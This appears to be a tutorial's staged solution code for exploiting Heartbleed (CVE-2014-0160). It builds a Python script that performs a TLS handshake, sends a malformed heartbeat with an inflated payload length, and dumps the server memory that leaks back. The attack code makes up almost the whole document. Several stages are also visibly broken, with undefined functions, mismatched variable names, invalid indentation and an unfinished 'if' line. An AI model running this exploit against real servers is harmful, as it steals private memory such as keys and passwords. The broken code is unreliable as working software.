Exploiting CVE-2014-0160 Solutions

Build Your Command Center

__version__ = 0.0.0
import argparse


def build_argument_parser():
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(dest="port",
    type=int,
    help="the port which you wish to test for Heartbleed, default is 443",
    default=443)
    return parser.parse_args()


if __name__ == '__main__':
    args = build_argument_parser()

Handling Sockets

__version__ = 0.0.0
import argparse
import logging
import socket

def hex2bytes(payload: str):
    return bytes.fromhex(payload)

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

def build_argument_parser():
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(dest="port",
    type=int,
    help="the port which you wish to test for Heartbleed, default is 443",
    default=443)
    return parser.parse_args()

def main(runtime_options: argparse.Namespace):

    socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    logging.info('Connecting...')
    socks.connect((args.host, args.port))
    logging.info('Sending Client Hello...')
    socks.send(hello)


if __name__ == '__main__':
    args = build_argument_parser()
    main(args)

Waiting for a Response & recvall()

__version__ = 0.0.0

import argparse
import logging
import socket
import struct

import hexdump

def hex2bytes(payload: str):
    return bytes.fromhex(payload)

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

def recvall(sock, count):
buf = b''
while count:
    newbuf = sock.recv(count)
    if not newbuf: return None
    buf += newbuf
    count -= len(newbuf)
return buf

def build_argument_parser():
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
    parser.add_argument(dest="port",
    type=int,
    help="the port which you wish to test for Heartbleed, default is 443",
    default=443)
    return parser.parse_args()

def main(runtime_options: argparse.Namespace):

    socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    logging.info('Connecting...')
    socks.connect((args.host, args.port))
    logging.info('Sending Client Hello...')
    socks.send(hello)

    while True:
        header = socks.recv(5)
        (content_type, version, length) = struct.unpack('>BHH', hdr)
        handshake = recvall(s, length)
        logging.info(f"Received message: type={content_type}, ver={version}, length={len(hand)}")

        if content_type == 22 and ord(hand[0]) == 0x0E:
            break

    logging.info('Handshake done...')
    logging.info('Sending heartbeat request with length 4.')

if __name__ == '__main__':
    args = build_argument_parser()
    main(args)

Exploiting Heartbleed

import argparse
import logging
import socket
import struct

import hexdump

__version__ = '0.0.1'


def h2bin(payload: str):
    return bytes.fromhex(payload)


hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

heartbeat = h2bin('''
18 03 02 00 03
01 40 00
''')

'''
Explanation of heartbeat (bf)call :
    18      : hearbeat record
    03 02   : TLS version
    00 03   : length
    01      : hearbeat request
    40 00   : payload length 16 384 bytes check rfc6520
                "The total length of a HeartbeatMessage MUST NOT exceed 2^14"
                If we enter FF FF -> 65 535, we will received 4 paquets of length 16 384 bytes
'''

def identify_content_type(content_type_as_int: int):
    if content_type_as_int


def hex_dump(sock: socket):
    print(hexdump.dump(sock, size=4, sep='-'))


def recvall(sock: socket, count: int):
    buf = b''
    while count:
        newbuf = sock.recv(count)
        if not newbuf:
            return None

        buf += newbuf
        count -= len(newbuf)
    return buf


def test_heartbleed(sock: socket):
    # send heartbeat request to the server
    sock.send(heartbeat)

    # start listening the answer from the server
    while True:

        # we first get the 5 bytes of the request : content_type, version, length
        # http://wiki.wireshark.org/SSL
        content_version_length = sock.recv(5)
        if content_version_length is None:
            logging.warning('Unexpected EOF receiving record header - server closed connection')
            return False
        (content_type, version, length) = struct.unpack('>BHH', content_version_length)

        if content_type is None:
            logging.warning('No heartbeat response received, server likely not vulnerable')
            return False

        # we can't use s.recv(length) because the server can separate the packet heartbeat into different smaller packet
        payload = recvall(sock, length)
        if payload is None:
            logging.warning('Unexpected EOF receiving record payload - server closed connection')
            return False

        # heartbeat content type is 24 check rfc6520
        if content_type == 24:
            print('Received heartbeat response in file out.txt')
            hex_dump(payload)
            if len(payload) > 3:
                logging.critical('Server returned more data than it should - server is vulnerable!')
            else:
                logging.warning('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        # error
        if content_type == 21:
            logging.info('Received alert:')
            hex_dump(payload)
            logging.info('Server returned error, likely not vulnerable')
            return False


def build_argument_parser():
    parser = argparse.ArgumentParser(description=f"""
 ██░ ██ ▓█████ ▄▄▄       ██▀███  ▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█   ▀▒████▄    ▓██ ▒ ██▒▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒██▀▀██░▒███  ▒██  ▀█▄  ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░▓█ ░██ ▒▓█  ▄░██▄▄▄▄██ ▒██▀▀█▄  ░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
░▓█▒░██▓░▒████▒▓█   ▓██▒░██▓ ▒██▒  ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
 ▒ ░░▒░▒░░ ▒░ ░▒▒   ▓▒█░░ ▒▓ ░▒▓░  ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒
 ▒ ░▒░ ░ ░ ░  ░ ▒   ▒▒ ░  ░▒ ░ ▒░    ░    ▒░▒   ░ ░ ░ ▒  ░ ░ ░  ░ ░ ░  ░ ░ ▒  ▒
 ░  ░░ ░   ░    ░   ▒     ░░   ░   ░       ░    ░   ░ ░      ░      ░    ░ ░  ░
 ░  ░  ░   ░  ░     ░  ░   ░               ░          ░  ░   ░  ░   ░  ░   ░
                                                ░                        ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(dest="host", help="the host that you wish to test for Heartbleed")
    parser.add_argument(dest="port",
                        type=int,
                        help="the port which you wish to test for Heartbleed, default is 443",
                        default=443)
    return parser.parse_args()


def main(runtime_options: argparse.Namespace):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    logging.info('Connecting...')
    sock.connect((runtime_options.host, runtime_options.port))

    logging.info('Sending Client Hello...')
    sock.send(hello)

    # pass the handshake
    while True:
        hdr = sock.recv(5)
        (content_type, version, length) = struct.unpack('>BHH', hdr)
        hand = recvall(sock, length)
        logging.info(' ... received message: type = %d, ver = %04x, length = %d' % (content_type, version, len(hand)))
        # Look for server hello done message.
        if content_type == 22 and hex(hand[0]) == '0xe':
            break

    logging.info('Handshake done...')
    logging.info('Sending heartbeat request with length 4:')
    test_heartbleed(sock)


if __name__ == '__main__':
    args = build_argument_parser()
    main(args)